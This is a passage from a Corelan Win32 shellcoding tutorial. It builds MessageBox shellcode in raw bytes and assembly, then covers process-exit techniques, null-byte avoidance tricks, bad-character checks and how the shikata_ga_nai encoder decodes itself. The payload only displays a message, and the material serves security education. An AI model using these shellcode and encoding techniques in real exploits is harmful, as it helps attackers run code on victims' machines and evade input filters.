that, based on the way we are pushing the strings onto the stack, we may need to push 4 more
bytes to the stack before jumping to the MessageBox API. (Just run things through a debugger
and you’ll find out what to do)
ok, here we go :
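char code[] =
//first put our strings on the stack
"\x68\x6c\x61\x6e\x00" // Push "Corelan"
"\x68\x43\x6f\x72\x65" // = Caption
"\x89\xe3" // mov ebx,esp = pointer to the caption
"\x68\x61\x6e\x20\x00" // Push
"\x68\x6f\x72\x65\x6c" // "You have been pwned by Corelan"
"\x68\x62\x79\x20\x43" // = Text
"\x68\x6e\x65\x64\x20" //
"\x68\x6e\x20\x70\x77" //
"\x68\x20\x62\x65\x65" //
"\x68\x68\x61\x76\x65" //
"\x68\x59\x6f\x75\x20" //
"\x89\xe1" // mov ecx,esp = pointer to the text
"\x31\xc0" // xor eax,eax => eax is now 00000000
"\x50" // push eax : button type (0)
"\x53" // push ebx : pointer to the caption
"\x51" // push ecx : pointer to the text
"\x50" // push eax : hWnd (0)
//push 4 more bytes
//to make sure the parameters are read from the right
//offset
"\x50" // push eax
"\xbe\xea\x07\x45\x7e" // mov esi,0x7E4507EA
"\xff\xe6"; // jmp esi = launch MessageBoxA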
Note : you can get the opcodes for simple instructions using the !pvefindaddr PyCommand for
Immunity Debugger.
Example :
Alternatively, you can use nasm_shell from the Metasploit tools folder to assemble instructions
into opcode :
xxxx@bt4:/pentest/exploits/framework3/tools# ./nasm_shell.rb
Back to the shellcode. Paste this c array in the “shellcodetest.c” application (see c source in
the “Basics” section of this post), make and compile.
Then load the shellcodetest.exe application in Immunity Debugger and set a breakpoint where
the main() function begins (in my case, this is 0x004012D4). Then press F9 and the debugger
should hit the breakpoint.
Now step through (F7), and at a certain point, a call to [ebp-4] is made. This is the call that
executes our shellcode – corresponding with the (int)(*func)(); statement in our C source.
Right after this call is made, the CPU view in the debugger looks like this :
This is indeed our shellcode. First we push “Corelan” to the stack and we save the address in
EBX. Then we push the other string to the stack and save the address in ECX.
Next, we clear eax (set eax to 0), and then we push 4 parameters to the stack : first zero (push
eax), then pointer to the Title (push ebx), then pointer to the MessageText (push ecx), then
zero again (push eax). Then we push another 4 bytes to the stack (alignment). Finally we put
the address of MessageBoxA into ESI and we jump to ESI.
Press F7 until JMP ESI is reached and executed. Right after JMP ESI is made, look at the stack :
That is exactly what we expected. Continue to press F7 until you have reached the CALL
USER32.MessageBoxExA instruction (just after the 5 PUSH operations, which push the
parameters to the stack). The stack should now (again) point to the correct parameters.
Another way to test our shellcode is by using skylined’s “Testival” tool. Just write the shellcode
to a bin file (using pveWritebin.pl), and then run Testival. We’ll assume you have written the
code to shellcode.bin :
(don’t be surprised that this command will just produce a crash – I will explain why that
happens in a little while)
Unfortunately, this shellcode is not ready to be used in a real exploit yet. There are some MAJOR issues with it :
1. The shellcode calls the MessageBox function, but does not properly clean up/exit after
the function has been called. So when the MessageBox function returns, the parent
process may just die/crash instead of exiting properly (or instead of not crashing at all,
in case of a real exploit). Ok, this is not a major issue, but it still can be an issue.
2. The shellcode contains null bytes. So if we want to use this shellcode in a real exploit,
that targets a string buffer overflow, it may not work because the null bytes act as a
string terminator. That is a major issue indeed.
3. The shellcode worked because user32.dll was mapped in the current process. If
user32.dll is not loaded, the API address of MessageBoxA won’t point to the function,
and the code will fail. Major issue – showstopper.
4. The shellcode contains a static reference to the MessageBoxA function. If this address
is different on other Windows Versions/Service Packs, then the shellcode won’t work.
Major issue again – showstopper.
Number 3 is the main reason why the w32-testival command didn’t work for our shellcode. In
the w32-testival process, user32.dll is not loaded, so the shellcode fails.
Shellcode exitfunc
In our C application, after calling the MessageBox API, 2 instructions were used to exit the
process : LEAVE and RET. While this works fine for standalone applications, our shellcode will
be injected into another application. So a leave/ret after calling the MessageBox will most
likely break stuff and cause a “big” crash.
There are 2 approaches to exit our shellcode : we can either try to kill things as silently as we
can, or we can try to keep the parent (exploited) process running… perhaps it
can be exploited again.
Obviously, if there is a specific reason not to exit the shellcode/process at all, then feel free not
to do so.
I’ll discuss 3 techniques that can be used to exit the shellcode with :
• process : this one will use ExitProcess()
• seh : this one will force an exception call. Keep in mind that this one might trigger the
exploit code to run over and over again (if the original bug was SEH based for example)
• thread : this one will use ExitThread()
Obviously, none of these techniques ensures that the parent process won’t crash or will
remain exploitable once it has been exploited. I’m only discussing the 3 techniques (which,
incidentally, are available in Metasploit too :-))
ExitProcess()
This technique is based on a Windows API called “ExitProcess”, found in kernel32.dll. One
parameter : the ExitProcess exitcode. This value (zero means everything was ok) must be
placed on the stack before calling the API
or, in byte/opcode :
Again, we’ll just assume that kernel32.dll is mapped/loaded automatically (which will be the
case – see later), so you can just call the ExitProcess API without further ado.
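As an illustration of the description above (exit code on the stack, then call the API), the stub can be assembled by hand. This is a minimal sketch: the helper name is mine, and 0x7c81CB12 is simply the address that the listings in this document load into EAX for this purpose on XP SP3, so treat it as system specific.

```python
import struct

def exit_stub(api_address: int) -> bytes:
    """xor eax,eax / push eax / mov eax,api_address / call eax"""
    return (
        b"\x31\xc0"                                   # xor eax,eax : exit code 0
        + b"\x50"                                     # push eax    : the one parameter
        + b"\xb8" + struct.pack("<I", api_address)    # mov eax,imm32
        + b"\xff\xd0"                                 # call eax
    )

stub = exit_stub(0x7C81CB12)
print(stub.hex())
```

Note that the byte listings later in this document end in \xff\xe0 (jmp eax) rather than \xff\xd0 (call eax). With a jmp no return address is pushed, so the zero ends up in the return address slot instead of the parameter slot; the process still exits, but the exit code is whatever happens to be next on the stack.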
SEH
A second technique to exit the shellcode (while trying to keep the parent process running) is
by triggering an exception (by performing call 0x00) – something like this :
xor eax,eax
call eax
While this code is clearly shorter than the others, it may lead to unpredictable results. If an
exception handler is set up, and you are taking advantage of the exception handler in your
exploit (SEH based exploit), then the shellcode may loop. That may be ok in certain cases (if,
for example, you are trying to keep a machine exploitable instead of exploiting it just once).
ExitThread()
Instead of looking up the address of this function using IDA, you can also use arwin, a little
script written by Steve Hanna
So simply replacing the call to ExitProcess with a call to ExitThread will do the job.
As explained above, you can use IDA or arwin to get functions/function pointers. If you have
installed Microsoft Visual Studio C++ Express, then you can use dumpbin as well. This
command line utility can be found at C:\Program Files\Microsoft Visual Studio 9.0\VC\bin.
Before you can use the utility you’ll need to get a copy of mspdb80.dll (download here) and
place it in the same (bin) folder.
You can now list all exports (functions) in a given dll : dumpbin path_to_dll /exports
Populating all exports from all dll’s in the windows\system32 folder can be done like this :
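rem https://www.corelan.be
rem
@echo off
cls
echo Exports > exports.log
for /f %%a IN ('dir /b %systemroot%\system32\*.dll')
do echo [+] Processing %%a &&
dumpbin %systemroot%\system32\%%a /exports
>> exports.log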
(put everything after the “for /f” statement on one line – I just added some line breaks for
readability purposes)
Save this batch file in the bin folder. Run the batch file, and you will end up with a text file that
has all the exports in all dll’s in the system32 folder. So if you ever need a certain function, you
can simply search through the text file. (Keep in mind, the addresses shown in the output are
RVA (relative virtual addresses), so you’ll need to add the base address of the module/dll to
get the absolute address of a given function)
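The RVA arithmetic is a single addition. A minimal sketch, using assumed example values (a module loaded at 0x7E410000 and an export with RVA 0x000407EA; check the real base address of the module on your own system):

```python
def absolute_address(module_base: int, rva: int) -> int:
    """Absolute address = load address of the module + relative virtual address."""
    return (module_base + rva) & 0xFFFFFFFF

# Assumed example values, for illustration only.
address = absolute_address(0x7E410000, 0x000407EA)
print(f"0x{address:08X}")
```

With these example values the result is 0x7E4507EA, the MessageBoxA address used earlier in this document.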
In the previous chapters we went from one line of C code to a set of assembler instructions.
Once you start to become familiar with these assembler instructions, it may become easier to
just write stuff directly in assembly and assemble that into opcodes, instead of resolving the
opcodes first and writing everything directly in opcode… That’s way too hard and there is an
easier way :
Create a text file that starts with [BITS 32] (don’t forget this or nasm may not be able to detect
that it needs to compile for 32 bit CPU x86), followed by the assembly instructions (which
could be found in the disassembly/debugger output):
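[BITS 32]
PUSH 0x006e616c ;push "Corelan" to stack
PUSH 0x65726f43
MOV EBX,ESP ;save pointer to "Corelan" in EBX
PUSH 0x00206e61 ;push "You have been pwned by Corelan"
PUSH 0x6c65726f
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
MOV ECX,ESP ;save pointer to "You have been..." in ECX
XOR EAX,EAX
PUSH EAX ;put parameters on the stack
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
JMP ESI ;MessageBoxA
XOR EAX,EAX ;clean up
PUSH EAX
MOV EAX,0x7c81CB12
JMP EAX ;ExitProcess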
Now use the pveReadbin.pl script to output the bytes from the .bin file in C format:
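#!/usr/bin/perl
# http://www.corelan.be
# Takes a filename as argument, reads the file and outputs the bytes in \x format
if ($#ARGV ne 0) {
  print " usage: $0 ".chr(34)."filename".chr(34)."\n";
  exit(0);
}
print "Reading ".$ARGV[0]."\n";
open(FILE,$ARGV[0]);
binmode FILE;
my ($data, $n, $offset) = ("", 0, 0);
my $strContent="";
while (($n = read FILE, $data, 1, $offset) != 0) {
  $offset += $n;
}
close(FILE);
print "Read ".$offset." bytes\n\n";
my $cnt=0;
my $nullbyte=0;
print chr(34);
for (my $i=0; $i < length($data); $i++) {
  my $c = substr($data, $i, 1);
  my $str1 = sprintf("%01x", (ord($c) & 0xf0) >> 4);
  my $str2 = sprintf("%01x", ord($c) & 0x0f);
  if ($cnt < 8) {
    print "\\x".$str1.$str2;
    $cnt=$cnt+1;
  } else {
    #start a new line of 8 bytes
    $cnt=1;
    print chr(34)."\n".chr(34)."\\x".$str1.$str2;
  }
  if (($str1 eq "0") && ($str2 eq "0")) {
    $nullbyte=$nullbyte+1;
  }
}
print chr(34).";\n";
print "\nNumber of null bytes : ".$nullbyte."\n";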
Output :
C:\shellcode>pveReadbin.pl msgbox.bin
Reading msgbox.bin
Read 78 bytes
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
From this point forward in this tutorial, we’ll continue to write our shellcode directly in
assembly code. If you were having a hard time understanding the asm code above, then stop
reading now and go back. The assembly used above is really basic and it should not take you a
long time to really understand what it does.
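For readers who do not have Perl at hand, the formatting step (8 bytes per line in C string notation, plus a null byte count) can be sketched in a few lines of Python. This is an illustration of the output format only, not a port of pveReadbin.pl; the function name is mine and the sample is just the first 17 bytes of msgbox.bin as printed above.

```python
def to_c_array(data: bytes, per_line: int = 8) -> str:
    """Format bytes as C string literals, per_line bytes on each line."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append('"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "\n".join(lines) + ";"

# First 17 bytes of msgbox.bin, copied from the output shown earlier.
sample = bytes.fromhex("686c616e0068436f" "726589e368616e20" "00")

print(to_c_array(sample))
print("Number of null bytes :", sample.count(0))
```

Counting the null bytes at this stage is useful, because they are the first thing that has to go before the shellcode can be used in a string based overflow.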
When we look back at the bytecode that was generated so far, we notice that it
contains null bytes. Null bytes may be a problem when you are overflowing a buffer that uses a null byte
as string terminator. So one of the main requirements for shellcode would be to avoid these
null bytes.
There are a number of ways to deal with null bytes : you can try to find alternative instructions
to avoid null bytes in the code, reproduce the original values, use an encoder, etc
At a certain point in our example, we had to set eax to zero. We could have used mov eax,0 to
do this, but that would have resulted in “\xc7\xc0\x00\x00\x00\x00”. Instead of doing that,
we used “xor eax,eax”. This gave us the same result and the opcode does not contain null
bytes. So one of the techniques to avoid null bytes is to look for alternative instructions that
will produce the same result.
In our example, we had 2 null bytes, caused by the fact that we needed to terminate the
strings that were pushed on the stack. Instead of putting the null byte in the push instruction,
perhaps we can generate the null byte on the stack without having to use a null byte.
This is a basic example of what an encoder does. It will, at runtime, reproduce the original
desired values/opcodes, while avoiding certain characters such as null bytes.
There are 2 ways to fix this null byte issue : we can either write some basic instructions that
will take care of the 2 null bytes (basically use different instructions that will end up doing the
same), or we can just encode the entire shellcode.
We’ll talk about payload encoders (encoding the entire shellcode) in one of the next chapters,
let’s look at manual instruction encoding first.
"\x68\x6c\x61\x6e\x00"
and
"\x68\x61\x6e\x20\x00"
How can we do the same (get these strings on the stack) without using null bytes in the
bytecode ?
What if we subtract 11111111 from 006E616C (= EF5D505B) , write the result to EBX, add
11111111 to EBX and then write it to the stack ? No null bytes, and we still get what we want.
So basically, we do this
Do the same for the other null byte (using ECX as register)
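The arithmetic is easy to get wrong by hand, so here is a small sketch that computes the value to load into the register and checks it for null bytes. The helper names are mine; the constant 0x11111111 is the one used in the text.

```python
MASK = 0xFFFFFFFF

def has_null(value: int) -> bool:
    """True if the 32 bit value contains a 0x00 byte."""
    return b"\x00" in value.to_bytes(4, "little")

def sub_encode(target: int, key: int = 0x11111111) -> int:
    """Value to load into the register so that adding key yields target."""
    return (target - key) & MASK

for target in (0x006E616C, 0x00206E61):
    encoded = sub_encode(target)
    # Adding the key back must reproduce the original dword (32 bit wraparound).
    assert (encoded + 0x11111111) & MASK == target
    status = "still contains a null byte" if has_null(encoded) else "null-free"
    print(f"0x{target:08X} -> MOV reg,0x{encoded:08X} / ADD reg,0x11111111 ({status})")
```

If the encoded value (or the key) happens to contain a null byte for some other string, simply pick a different key.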
In assembly :
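[BITS 32]
XOR EAX,EAX
MOV EBX,0xEF5D505B
ADD EBX,0x11111111 ;EBX now contains 0x006E616C
PUSH EBX ;push "lan" + null byte
PUSH 0x65726f43
MOV EBX,ESP ;save pointer to "Corelan" in EBX
MOV ECX,0xEF0F5D50
ADD ECX,0x11111111 ;ECX now contains 0x00206E61
PUSH ECX
PUSH 0x6c65726f
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
MOV ECX,ESP ;save pointer to "You have been..." in ECX
PUSH EAX ;put parameters on the stack
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
JMP ESI ;MessageBoxA
XOR EAX,EAX ;clean up
PUSH EAX
MOV EAX,0x7c81CB12
JMP EAX ;ExitProcess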
Of course, this increases the size of our shellcode, but at least we did not have to use null
bytes.
After compiling the asm file and extracting the bytes from the bin file, this is what we get :
Reading msgbox2.bin
Read 92 bytes
"\x31\xc0\xbb\x5b\x50\x5d\xef\x81"
"\xc3\x11\x11\x11\x11\x53\x68\x43"
"\x6f\x72\x65\x89\xe3\xb9\x50\x5d"
"\x0f\xef\x81\xc1\x11\x11\x11\x11"
"\x51\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x50\x53"
"\x51\x50\x50\xbe\xea\x07\x45\x7e"
"\xff\xe6\x31\xc0\x50\xb8\x12\xcb"
"\x81\x7c\xff\xe0";
To prove that it works, we’ll load our custom shellcode in a regular exploit, (on XP SP3, in an
application that has user32.dll loaded already)… an application such as Easy RM to MP3
Converter for example. (remember tutorial 1 ?)
A similar technique (to the one explained here) is used in certain encoders… If you extend
this technique, it can be used to reproduce an entire payload, and you could limit the
character set to, for example, alphanumerical characters only. A good example of what I mean
by this can be found in tutorial 8.
A second technique that can be used to overcome the null byte problem in our shellcode is this
:
• write the value to the stack without null bytes (so replace the null byte with something
else)
• overwrite that byte on the stack with a null byte, using a part of a register that already
contains null, and referring to a negative offset from ebp. Using a negative offset will
result in \xff bytes (and not \x00 bytes) in the instruction, thus bypassing the null byte limitation
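[BITS 32]
XOR EAX,EAX ;set EAX to zero
MOV EBP,ESP ;set EBP to ESP so we can use negative offsets
PUSH 0xFF6E616C ;push part of string to stack (FF is a placeholder)
MOV [EBP-1],AL ;overwrite FF with 00
PUSH 0x65726f43 ;push rest of string to stack
MOV EBX,ESP ;save pointer to "Corelan" in EBX
PUSH 0xFF206E61 ;push part of string to stack (FF is a placeholder)
MOV [EBP-9],AL ;overwrite FF with 00
PUSH 0x6c65726f ;push rest of string to stack
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
MOV ECX,ESP ;save pointer to "You have been..." in ECX
PUSH EAX ;put parameters on the stack
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
JMP ESI ;MessageBoxA
XOR EAX,EAX ;clean up
PUSH EAX
MOV EAX,0x7c81CB12
JMP EAX ;ExitProcess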
This technique uses the same concept as solution 2, but instead of overwriting a byte with a null
byte, we start off by writing null bytes to the stack (xor eax,eax + push eax), and then reproduce
the non-null bytes by writing individual bytes to negative offsets from ebp
• put null bytes on the stack (xor eax,eax + push eax)
• write the non-null bytes to an exact negative offset location relative to the stack’s base
pointer (ebp)
Example :
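[BITS 32]
XOR EAX,EAX ;set EAX to zero
MOV EBP,ESP ;set EBP to ESP so we can use negative offsets
PUSH EAX ;4 null bytes at EBP-4 .. EBP-1
MOV BYTE [EBP-2],6Eh ;'n'
MOV BYTE [EBP-3],61h ;'a' (then MOV BYTE [EBP-4],6Ch for 'l')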
It becomes clear that the last 2 techniques will have a negative impact on the shellcode size,
but they work just fine.
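To see why both approaches end up with the same bytes in memory, the stack can be modelled as a small byte array. This is only a sketch: the 16 byte "stack", the helper name and the 0xFF placeholder byte are my own assumptions for illustration.

```python
def push(memory: bytearray, esp: int, value: int) -> int:
    """Model of PUSH imm32: store value little-endian and return the new ESP."""
    esp -= 4
    memory[esp:esp + 4] = value.to_bytes(4, "little")
    return esp

# Overwrite approach: push with a placeholder byte, then patch it with AL (= 0).
memory = bytearray(b"\xcc" * 16)
ebp = esp = 16                        # MOV EBP,ESP
esp = push(memory, esp, 0xFF6E616C)   # PUSH 0xFF6E616C
memory[ebp - 1] = 0x00                # MOV [EBP-1],AL
overwrite_result = bytes(memory[esp:ebp])

# Reverse approach: push null bytes first, then write the non-null bytes one by one.
memory = bytearray(b"\xcc" * 16)
ebp = esp = 16                        # MOV EBP,ESP
esp = push(memory, esp, 0x00000000)   # XOR EAX,EAX / PUSH EAX
memory[ebp - 2] = 0x6E                # MOV BYTE [EBP-2],6Eh
memory[ebp - 3] = 0x61                # MOV BYTE [EBP-3],61h
memory[ebp - 4] = 0x6C                # MOV BYTE [EBP-4],6Ch
reverse_result = bytes(memory[esp:ebp])

print(overwrite_result, reverse_result)
```

Both variants leave "lan" followed by a null byte at ESP, without a single \x00 in the instruction bytes that produced it.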
Solution 4 : xor
Another technique is to write specific values in 2 registers, that will – when an xor operation is
performed on the values in these 2 registers, produce the desired value.
So let’s say you want to put 0x006E616C onto the stack, then you can do this :
Type 777777FF
Press XOR
Type 006E616C
Result : 77191693
Now put each value (777777FF and 77191693) into 2 registers, xor them, and push the
resulting value onto the stack :
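[BITS 32]
MOV EAX,0x777777FF
MOV EBX,0x77191693
XOR EAX,EBX ;EAX now contains 0x006E616C
PUSH EAX ;push it to stack
PUSH 0x65726f43 ;push rest of string to stack
MOV EBX,ESP ;save pointer to "Corelan" in EBX
MOV EAX,0x777777FF
MOV EDX,0x7757199E ;don't use EBX, it already holds the pointer to "Corelan"
XOR EAX,EDX ;EAX now contains 0x00206E61
PUSH EAX ;push it to stack
PUSH 0x6c65726f ;push rest of string to stack
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
MOV ECX,ESP ;save pointer to "You have been..." in ECX
XOR EAX,EAX ;set EAX to zero
PUSH EAX ;put parameters on the stack
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
JMP ESI ;MessageBoxA
XOR EAX,EAX ;clean up
PUSH EAX
MOV EAX,0x7c81CB12
JMP EAX ;ExitProcess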
Remember this technique – you’ll see an improved implementation of this technique in the
payload encoders section.
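Instead of using a calculator, the second value can be computed (and both values checked for null bytes) with a couple of lines of code. A minimal sketch; the helper names are mine and 0x777777FF is the key used in the text:

```python
def xor_pair(target: int, key: int = 0x777777FF) -> tuple:
    """Return (key, other) such that key ^ other == target."""
    return key, key ^ target

def null_free(value: int) -> bool:
    """True if none of the 4 bytes of value is 0x00."""
    return 0 not in value.to_bytes(4, "little")

for target in (0x006E616C, 0x00206E61):
    key, other = xor_pair(target)
    print(f"0x{key:08X} ^ 0x{other:08X} = 0x{key ^ other:08X}",
          "null-free" if null_free(key) and null_free(other) else "contains null bytes")
```

A byte of the second value only becomes zero when the key byte equals the target byte at that position, so choosing a different key fixes any collision.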
We are running Intel x86 assembly, on a 32bit CPU. So the registers we are dealing with are
32 bits (4 bytes) wide, and they can be referred to by using 4 byte, 2 byte or 1 byte
notations : EAX (“Extended” …) is 4 bytes, AX is 2 bytes, and AL (low) or AH (high) are 1 byte.
So we can take advantage of that to avoid null bytes.
PUSH 0x1
\x68\x01\x00\x00\x00
Example :
XOR EAX,EAX
MOV AL,1
PUSH EAX
or, in bytecode :
\x31\xc0\xb0\x01\x50
[BITS 32]
PUSH 0x1
INT 3
XOR EAX,EAX
MOV AL,1
PUSH EAX
INT 3
Both bytecodes are 5 bytes, so avoiding null bytes does not necessarily mean your code will
increase in size.
You can obviously use this in many ways (for example to overwrite a character with a null
byte, etc).
XOR EAX,EAX
INC EAX
PUSH EAX
\x31\xc0\x40\x50
(=> only 4 bytes… so you can even decrease the number of bytes by being a little bit creative)
\x6A\x01
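The byte sequences listed in this section can be compared side by side. The sketch below only measures the bytes quoted above (length and number of null bytes); the labels are my own descriptions of the instructions:

```python
# Encodings of "put the value 1 on the stack", copied from this section.
variants = {
    "push 0x1 (32 bit immediate)":        b"\x68\x01\x00\x00\x00",
    "xor eax,eax / mov al,1 / push eax":  b"\x31\xc0\xb0\x01\x50",
    "xor eax,eax / inc eax / push eax":   b"\x31\xc0\x40\x50",
    "push byte 0x1 (8 bit immediate)":    b"\x6a\x01",
}

# For every variant: (size in bytes, number of null bytes).
report = {name: (len(code), code.count(0)) for name, code in variants.items()}
for name, (size, nulls) in report.items():
    print(f"{name:36} {size} bytes, {nulls} null bytes")
```

Only the first variant contains null bytes, and it is also the joint longest, which illustrates that null-free code is not automatically bigger.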
If you have to write a string to the stack and end it with a null byte, you can also do this :
• write the string and use spaces (0x20) at the end to make everything 4 byte aligned
Example : if you need to write “Corelan” to the stack, you can do this :
PUSH 0x006e616c
PUSH 0x65726f43
but you can also do this : (use space instead of null byte, and then push null bytes using a
register)
XOR EAX,EAX
PUSH EAX
PUSH 0x206e616c
PUSH 0x65726f43
Conclusion :
These are just a few of many techniques to deal with null bytes. The ones listed here should at
least give you an idea about some possibilities if you have to deal with null bytes and you don’t
want to (or – for whatever reason – you cannot) use a payload encoder.
Of course, instead of just changing individual instructions, you could use an encoding
technique that would encode the entire shellcode. This technique is often used to avoid bad
characters… and in fact, a null byte can be considered to be a bad character too.
So this is the right time to write a few words about payload encoding.
(Payload) Encoders
Encoders are not only used to filter out null bytes. They can be used to filter out bad
characters in general (or overcome a character set limitation)
Bad characters are not shellcode specific – they are exploit specific. They are the result of
some kind of operation that was executed on your payload before your payload could get
executed (for example replacing spaces with underscores, or converting input to uppercase).
In the case of null bytes, the payload buffer changes because it gets
terminated/truncated.
The best way to detect if your shellcode will be subject to a bad character restriction is to put
your shellcode in memory, and compare it with the original shellcode, and list the differences.
You obviously could do this manually (compare bytes in memory with the original shellcode
bytes), but it will take a while.
First, write your shellcode to a file (pveWritebin.pl – see earlier in this document)… write it to
c:\tmp\shellcode.bin for example
Next, attach Immunity Debugger to the application you are trying to exploit and feed the
payload (containing the shellcode) to this application.
When the application crashes (or stops because of a breakpoint set by you), run the following
command to compare the shellcode in file with the shellcode in memory :
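The idea behind such a comparison is simple enough to sketch offline. The snippet below is not the debugger command, just an illustration of the principle; the function name is mine and the "memory dump" is a hypothetical example in which the copy stopped at the first null byte.

```python
def compare(original: bytes, in_memory: bytes) -> list:
    """Return (offset, expected, found) for every differing byte.

    found is None when the in-memory copy ends before that offset."""
    diffs = []
    for offset, expected in enumerate(original):
        found = in_memory[offset] if offset < len(in_memory) else None
        if found != expected:
            diffs.append((offset, expected, found))
    return diffs

original = b"\x68\x6c\x61\x6e\x00\x68\x43\x6f\x72\x65"
# Hypothetical dump: the buffer was truncated at the null byte.
in_memory = b"\x68\x6c\x61\x6e"

differences = compare(original, in_memory)
for offset, expected, found in differences:
    shown = "missing" if found is None else f"0x{found:02x}"
    print(f"offset {offset}: expected 0x{expected:02x}, found {shown}")
```

The first offset that differs usually points straight at the bad character that caused the corruption.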
If you already know what your bad chars are (based on the type of application, input, buffer
conversion, etc), you can use a different technique to see if your shellcode will work.
Suppose you have figured out that the bad chars you need to take care of are 0x48, 0x65,
0x6C, 0x6F, 0x20, then you can use skylined’s beta3 utility again. You need to have a bin file
again (bytecode written to file) and then run the following command against the bin file :
If one of these “bad chars” is found, its position in the shellcode will be indicated.
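If you do not have beta3 at hand, the same check is easy to sketch in Python. The helper name `find_bad_chars` is made up for this example; the bad character list is the one from the text above.

```python
# Bad characters from the example above: 0x48, 0x65, 0x6C, 0x6F, 0x20
BAD_CHARS = bytes([0x48, 0x65, 0x6C, 0x6F, 0x20])


def find_bad_chars(shellcode: bytes, bad_chars: bytes = BAD_CHARS):
    """Return a list of (offset, byte) for every bad character found."""
    return [(offset, byte)
            for offset, byte in enumerate(shellcode)
            if byte in bad_chars]


# In practice you would read the bin file instead, for example:
#   shellcode = open(r"c:\tmp\shellcode.bin", "rb").read()
sample = b"\x68\x6c\x61\x6e\x00\x68\x43\x6f"

for offset, byte in find_bad_chars(sample):
    print(f"bad char 0x{byte:02x} at offset {offset}")
```

An empty result means the shellcode can be used as-is for this particular character restriction.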
Encoders : Metasploit
When the data character set used in a payload is restricted, an encoder may be required to
overcome those restrictions. The encoder will either wrap the original code, prepend it with a
decoder which will reproduce the original code at runtime, or will modify the original code so
it would comply with the given character set restrictions.
The most commonly used shellcode encoders are the ones found in Metasploit, and the ones
written by skylined (alpha2/alpha3).
Let’s have a look at what the Metasploit encoders do and how they work (so you would know
when to pick one encoder over another).
You can get a list of all encoders by running the ./msfencode -l command. Since I am
targeting the win32 platform, we are only going to look at the ones that were written for x86 :
./msfencode -l -a x86
The default encoder in Metasploit is shikata_ga_nai, so we’ll have a closer look at that one.
x86/shikata_ga_nai
Let’s use our original message shellcode (the one with null bytes) and encode it with
shikata_ga_nai, filtering out null bytes :
Original shellcode
Reading msgbox.bin
Read 78 bytes
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c";
(Don’t worry if the output looks different on your system – you’ll understand why it could be
different in just a few moments)
Loaded into the debugger (using the testshellcode.c application), the encoded shellcode looks
like this :
As you step through the instructions, the first time the XOR instruction (XOR DWORD PTR
DS:[EBX+15],EDI) is executed, an instruction below it (XOR EDX,93243469) is changed to a LOOPD
instruction :
From that point forward, the decoder will loop and reproduce the original code… that’s nice,
but how does this encoder/decoder really work ?
1. it will take the original shellcode and perform XOR/ADD/SUB operations on it. In this
example, the XOR operation starts with an initial value of 58010763 (which is put in EDI in the
decoder). The XORed bytes are written after the decoder loop.
2. it will produce a decoder that will recombine/reproduce the original code, and write it right
below the decoding loop. The decoder will be prepended to the xor’ed instructions. Together,
these 2 components make the encoded payload.
• FCMOVNE ST,ST(1) (FPU instruction, needed to make FSTENV work – see later)
• SUB ECX,ECX
• FSTENV PTR SS: [ESP-C] : this results in getting the address of the first FPU instruction
of the decoder (FCMOVNE in this example). The requisite to make this instruction work
is that at least one FPU instruction is executed before this one – doesn’t matter which
one. (so FLDPI should work too)
• POP EBX : the address of the first instruction of the decoder is put in EBX (popped from
the stack)
It looks like the goal of the previous instructions was : “get the address of the beginning of the
decoder and put it in EBX” (GetPC – see later), and “set ECX to 14”.
• XOR DWORD PTR DS: [EBX+15], EDI : perform XOR operation using EBX+15 and EDI,
and write the result at EBX+15. The first time this instruction is executed, a LOOPD
instruction is recombined.
• ADD EDI, DWORD PTR DS:[EBX+15] : EDI is increased with the bytes that were
recombined at EBX+15, by the previous instruction.
Ok, it starts to make sense. The first instructions in the decoder determine the address of the
